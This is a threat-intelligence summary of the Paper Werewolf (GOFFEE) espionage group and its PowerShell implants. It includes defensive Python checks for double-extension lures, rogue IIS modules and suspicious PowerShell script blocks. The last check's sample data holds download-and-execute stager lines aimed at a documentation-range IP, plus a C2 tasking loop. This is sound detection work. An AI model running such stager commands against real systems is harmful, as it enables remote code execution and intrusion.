Full Report
The threat actor known as Paper Werewolf has been observed exclusively targeting Russian entities with a new implant called PowerModul. The activity, which took place between July and December 2024, singled out organizations in the mass media, telecommunications, construction, government entities, and energy sectors, Kaspersky said in a new report published Thursday. Paper Werewolf, also known
Analysis Summary
# Threat Actor: Paper Werewolf (GOFFEE)
## Attribution & Identity
* **Primary Name:** Paper Werewolf
* **Aliases:** GOFFEE
* **Associated Groups:** Mentioned in context alongside Sapphire Werewolf (a distinct group attributed to a separate phishing campaign by BI.ZONE).
## Activity Summary
* **Observed Activity Window:** July to December 2024 for the latest campaigns; Kaspersky has tracked the group since 2022.
* **Historical Campaigns:** Assessed to have conducted at least seven campaigns since 2022.
* **Recent Operations:** Attacks initiated via phishing emails containing macro-laced lure documents or RAR archives with deceptive, double-extension executables masquerading as PDF or Word files. A key feature of some intrusions is the inclusion of a *disruptive component* aimed at changing employee account passwords, going beyond standard espionage.
## Tactics, Techniques & Procedures
* **Initial Access:**
* Phishing emails carrying macro-laced lure documents (Word documents with malicious VBA macros, a technique the group was observed using for the first time in these campaigns).
* Malicious RAR archives containing an executable that uses double extensions (`*.pdf.exe` or `*.doc.exe`).
* **Execution:**
* Initial execution deploys either the PowerShell-based Remote Access Trojan (RAT) **PowerRAT** or the new implant **PowerModul**, a PowerShell script that receives and executes further PowerShell scripts from the C2 server.
* Infection chain involving patching system files (`explorer.exe` or `xpsrchvw.exe`) with malicious shellcode to deploy an obfuscated Mythic agent.
* **Persistence/Command and Control:**
* Use of **PowerModul** and **PowerTaskel** to execute commands and receive payloads from the C2 server.
* Recent trend: the group is increasingly abandoning PowerTaskel in favor of the binary **Mythic agent** for lateral movement.
* **Credential Access & Exfiltration:**
* Use of the malicious IIS module **Owowa** to retrieve Microsoft Outlook credentials entered by users on the web client.
* PsExec, a lateral-movement utility, is used by PowerTaskel to escalate privileges.
* **Defense Evasion:**
* Deception: Showing a decoy file (downloaded from a remote server) to the user while infection proceeds in the background.
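The double-extension lure described under Initial Access (`*.pdf.exe`, `*.doc.exe` inside a RAR) is simple to catch at a mail gateway once the archive listing is available. The following is an added example, not code from the Kaspersky report or from the actor's tooling: the extension sets, the sample attachment names and the archive member lists are constructed, and the listing itself is assumed to come from whatever already unpacks archives at your gateway. It also handles the padded form (`report.pdf        .exe`), which the page does not mention but which the same check covers.

```python
"""Double-extension lure check. Added example, not code from the Kaspersky
report; the extension sets and sample filenames below are constructed."""
from typing import Dict, List, Optional, Tuple

# Extensions Windows will run directly (assumed list; align with your gateway's block list).
EXECUTABLE_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "js", "jse",
                   "vbs", "vbe", "wsf", "wsh", "hta", "lnk", "msi", "ps1"}
# "Document-looking" extensions an attacker places before the real one.
DECOY_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "rtf",
              "txt", "odt", "jpg", "jpeg", "png"}


def classify_name(name: str) -> Optional[str]:
    """Return a reason if `name` uses the double-extension trick, else None.

    Handles both `report.pdf.exe` and the padded form `report.pdf      .exe`,
    where spaces push the real extension out of view in a file listing.
    """
    base = name.replace("\\", "/").rsplit("/", 1)[-1]      # drop any directory prefix
    parts = [p.strip().lower() for p in base.split(".")]
    if len(parts) < 3:                                     # need stem + decoy + real extension
        return None
    decoy, real = parts[-2], parts[-1]
    if real in EXECUTABLE_EXTS and decoy in DECOY_EXTS:
        return f"double extension: presented as .{decoy}, actually .{real}"
    return None


def scan_attachments(attachments: Dict[str, Optional[List[str]]]) -> List[Tuple[str, str]]:
    """Check each attachment and, for archives, each member name.

    `attachments` maps attachment filename -> list of archive member paths,
    or None when the attachment is not an archive. Member names come from
    whatever already lists the archive at your gateway (e.g. `unrar l`);
    only the name logic is shown here. Returns (path, reason) pairs.
    """
    hits: List[Tuple[str, str]] = []
    for att_name, members in attachments.items():
        reason = classify_name(att_name)
        if reason:
            hits.append((att_name, reason))
        for member in members or []:
            reason = classify_name(member)
            if reason:
                hits.append((f"{att_name}:{member}", reason))
    return hits


# Constructed sample message: one bare lure, one RAR with two lures, and benign files.
SAMPLE_ATTACHMENTS: Dict[str, Optional[List[str]]] = {
    "Invoice_2024.pdf.exe": None,
    "documents.rar": ["Договор.doc.exe", "readme.txt", "Отчёт.pdf                .exe"],
    "quarterly.zip": ["report.docx", "images/logo.png", "archive.tar.gz"],
    "notes.txt": None,
}

if __name__ == "__main__":
    for path, reason in scan_attachments(SAMPLE_ATTACHMENTS):
        print(f"QUARANTINE {path}: {reason}")
```

A single-extension executable (`setup.exe`) is deliberately not flagged here; that case belongs to the plain executable block list, and keeping the two checks separate avoids double counting in gateway metrics. Note also that `archive.tar.gz` has three dot-separated parts but is left alone because the final extension is not executable.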
## Targeting
* **Sectors:** Mass media, telecommunications, construction, government entities, and the energy sector. Financial organizations were also historically targeted.
* **Geography:** Exclusively targeting Russian entities.
* **Victims:** Government, energy, financial, and media organizations within Russia.
## Tools & Infrastructure
* **Malware Families Used:**
* **PowerModul:** Primary PowerShell implant used since early 2024.
* **PowerRAT:** PowerShell-based RAT used for initial deployment.
* **PowerTaskel:** Tool similar to PowerModul, used for executing C2 scripts and check-ins.
* **Mythic Agent/Framework:** Custom versions deployed post-initial access (e.g., obfuscated Mythic agent via shellcode).
* **QwakMyAgent:** Additional payload delivered.
* **Owowa:** Malicious IIS module for credential harvesting.
* **FlashFileGrabber / FlashFileGrabberOffline:** Used to steal files from removable media, with the offline variant copying specific file types to `%TEMP%\CacheStore\connect\`.
* **USB Worm:** Capable of infecting removable media with a copy of PowerModul.
* **Infrastructure:** Command-and-control (C2) servers deliver payloads and receive data. The report excerpt names no C2 domains or IP addresses.
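Owowa is listed above as a malicious IIS module, and the mitigations below ask for a review of IIS module registrations. The following is an added example, not from the Kaspersky report, of what such a review looks like against `applicationHost.config`: it flags native modules whose DLL loads from outside the expected directories and managed modules that are absent from a baseline or whose assembly is not strong-named. The trusted directories, the baseline set and the sample configuration (including the planted `HttpLoggingModule` path and the `OwaAuthHelper` entry) are all constructed assumptions for this example.

```python
"""Review of IIS module registrations in applicationHost.config, to surface a module
added outside the normal baseline, the way a malicious IIS module such as Owowa would
be. Added example, not from the report; trusted paths, baseline and the sample config
are assumptions."""
import re
import xml.etree.ElementTree as ET
from typing import List, Tuple

# Directories from which native (globalModules) DLLs are expected to load. Assumed baseline.
TRUSTED_IMAGE_DIRS = ("c:\\windows\\system32\\inetsrv\\", "c:\\windows\\microsoft.net\\")
# Managed module names recorded from a known-good server of the same role. Assumed baseline.
BASELINE_MANAGED = {"HttpCacheModule", "FormsAuthentication", "WindowsAuthentication",
                    "DefaultAuthentication", "UrlAuthorization", "Session", "OutputCache"}
PKT_RE = re.compile(r"PublicKeyToken=([0-9a-f]{16}|null)", re.I)
ENV_VARS = {"windir": "C:\\Windows", "systemroot": "C:\\Windows"}


def expand_windows_vars(path: str) -> str:
    """Expand %windir%-style variables as IIS does, so paths can be compared."""
    return re.sub(r"%(\w+)%", lambda m: ENV_VARS.get(m.group(1).lower(), m.group(0)), path)


def review_iis_modules(config_xml: str) -> List[Tuple[str, str]]:
    """Return (module name, reason) for every registration that deviates from the baseline."""
    findings: List[Tuple[str, str]] = []
    web_server = ET.fromstring(config_xml).find("system.webServer")
    if web_server is None:
        return findings

    for add in web_server.findall("globalModules/add"):
        name = add.get("name", "")
        image = expand_windows_vars(add.get("image", ""))
        if not image.lower().startswith(TRUSTED_IMAGE_DIRS):
            findings.append((name, f"native module loads from outside trusted directories: {image}"))

    for add in web_server.findall("modules/add"):
        name, type_name = add.get("name", ""), add.get("type", "")
        reasons = []
        if name not in BASELINE_MANAGED:
            reasons.append("not in managed-module baseline")
        # A fully qualified type carries an assembly spec after the first comma;
        # Microsoft assemblies are strong-named, so a missing or null token stands out.
        if "," in type_name:
            token = PKT_RE.search(type_name)
            if token is None or token.group(1).lower() == "null":
                reasons.append("assembly is not strong-named (PublicKeyToken missing or null)")
        if reasons:
            findings.append((name, "; ".join(reasons)))
    return findings


# Constructed applicationHost.config fragment: two planted modules among legitimate ones.
SAMPLE_APPHOST = r"""<configuration>
  <system.webServer>
    <globalModules>
      <add name="UriCacheModule" image="%windir%\System32\inetsrv\cachuri.dll" />
      <add name="StaticFileModule" image="%windir%\System32\inetsrv\static.dll" />
      <add name="ManagedEngineV4.0_64bit" image="%windir%\Microsoft.NET\Framework64\v4.0.30319\webengine4.dll" />
      <add name="HttpLoggingModule" image="C:\ProgramData\Temp\loghttp.dll" />
    </globalModules>
    <modules>
      <add name="HttpCacheModule" lockItem="true" />
      <add name="FormsAuthentication" type="System.Web.Security.FormsAuthenticationModule" preCondition="managedHandler" />
      <add name="OwaAuthHelper" type="Helper.OwaAuthHelper, OwaAuthHelper, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null" />
    </modules>
  </system.webServer>
</configuration>
"""

if __name__ == "__main__":
    for name, reason in review_iis_modules(SAMPLE_APPHOST):
        print(f"{name}: {reason}")
```

On a real server the file to read is `%windir%\System32\inetsrv\config\applicationHost.config`, and the same `<modules>` check should be run over each site's `web.config`, because a module can be registered at site level only. Exchange registers a number of its own modules on the OWA site, so the baseline must be captured from a known-good server of the same role rather than from a bare IIS install, otherwise every Exchange host will appear full of findings.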
## Implications
Paper Werewolf (GOFFEE) remains an active and evolving threat focused on espionage against Russian organizations, with a disruptive component in some intrusions. Its latest observed activity favors PowerShell-based implants (PowerModul, PowerTaskel) and the open-source Mythic C2 framework for execution and lateral movement, which gives the operators flexibility and helps them blend in with legitimate administrative activity. The deliberate disruption (changing employee account passwords) adds operational impact beyond data theft.
## Mitigations
* **Email Security:** Enhance filtering for macro-laced documents and RAR archives, especially those exhibiting double extensions. Implement macro restrictions across the organization.
* **Endpoint Detection & Response (EDR):** Enable PowerShell script block and module logging, monitor for execution patterns consistent with RAT activity (PowerRAT, PowerModul, and PowerTaskel retrieving and running remote scripts), and alert on suspicious use of legitimate binaries such as PsExec for privilege escalation or lateral movement.
* **Application Hardening:** Review IIS configurations and monitor for suspicious third-party modules being loaded to prevent credential harvesting like that done by Owowa.
* **Data Handling:** Implement strict policies regarding removable media insertion, given the actor's use of USB Worms and FlashFileGrabber components targeting flash drives.
* **Identity Protection:** Enforce multi-factor authentication (MFA) on Outlook on the web and other critical employee accounts so that credentials harvested by a module such as Owowa are not sufficient on their own, and alert on bulk or out-of-hours password changes so the disruptive component is caught early.
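The EDR mitigation above is only actionable once "PowerShell execution patterns consistent with RAT activity" is turned into something a detection pipeline can evaluate. The block below is an added example, not code from the report or from any vendor product: it scores the script-block text that Windows records in event 4104 (Microsoft-Windows-PowerShell/Operational) for the download-and-execute behaviour an implant such as PowerModul, which fetches further PowerShell from its C2, depends on. It decodes `-EncodedCommand` payloads (base64 of UTF-16LE) so the inner script is scored as well. The indicator list, the threshold, and the sample script blocks (using documentation address space) are assumptions for the example.

```python
"""Heuristic scoring of PowerShell script-block text (the ScriptBlockText field of
Microsoft-Windows-PowerShell/Operational event 4104). Added example, not code from
the report; indicator list, threshold and sample events are assumptions."""
import base64
import re
from typing import List, Tuple

# Each indicator is one behaviour a download-and-execute PowerShell stager shows.
INDICATORS = [
    ("encoded_command", re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("iex",            re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
    ("download",       re.compile(r"net\.webclient|downloadstring|downloadfile|"
                                  r"invoke-webrequest|invoke-restmethod|\biwr\b|\birm\b", re.I)),
    ("hidden_window",  re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("policy_bypass",  re.compile(r"-ex(?:ecutionpolicy)?\s+bypass|-nop\b|-noprofile\b", re.I)),
    ("base64_decode",  re.compile(r"frombase64string", re.I)),
    ("beacon_loop",    re.compile(r"while\s*\(\s*\$true\s*\)", re.I)),
]
ENCODED_RE = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)
THRESHOLD = 2   # assumed; tune against your own baseline of administrative script blocks


def decode_encoded_commands(text: str) -> List[str]:
    """Decode -EncodedCommand payloads (base64 of UTF-16LE) so the inner script is scored too."""
    decoded = []
    for b64 in ENCODED_RE.findall(text):
        try:
            decoded.append(base64.b64decode(b64, validate=True).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            continue
    return decoded


def score_script_block(text: str) -> Tuple[int, List[str]]:
    """Return (number of distinct indicators, their names), scanning decoded layers as well."""
    hits = set()
    for layer in [text] + decode_encoded_commands(text):
        for name, rx in INDICATORS:
            if rx.search(layer):
                hits.add(name)
    return len(hits), sorted(hits)


def is_suspicious(text: str, threshold: int = THRESHOLD) -> bool:
    """True when the block shows at least `threshold` distinct stager behaviours."""
    return score_script_block(text)[0] >= threshold


# Constructed sample script blocks. 203.0.113.0/24 is documentation address space.
INNER_STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/stage2')"
SAMPLE_BLOCKS = {
    "admin_housekeeping": "Get-ChildItem C:\\Users -Recurse | Where-Object { $_.Length -gt 1MB }",
    "plain_stager": "powershell -nop -w hidden -c \"" + INNER_STAGER + "\"",
    "encoded_stager": "powershell -enc " + base64.b64encode(INNER_STAGER.encode("utf-16-le")).decode(),
    "tasking_loop": "while($true){ try { IEX (Invoke-RestMethod 'http://203.0.113.10/task') } "
                    "catch {} ; Start-Sleep -Seconds 60 }",
}

if __name__ == "__main__":
    for label, block in SAMPLE_BLOCKS.items():
        score, names = score_script_block(block)
        verdict = "SUSPICIOUS" if is_suspicious(block) else "ok"
        print(f"{label:20} score={score} {verdict} {names}")
```

Scoring distinct behaviours rather than matching a single string is what keeps the rule useful against a PowerShell-only implant: a renamed cmdlet alias or a different download primitive costs the attacker one indicator, not the whole detection. The encoded layer matters because a stager passed through `-EncodedCommand` shows none of the other indicators in the raw event text; only after decoding does `IEX` plus the download call appear.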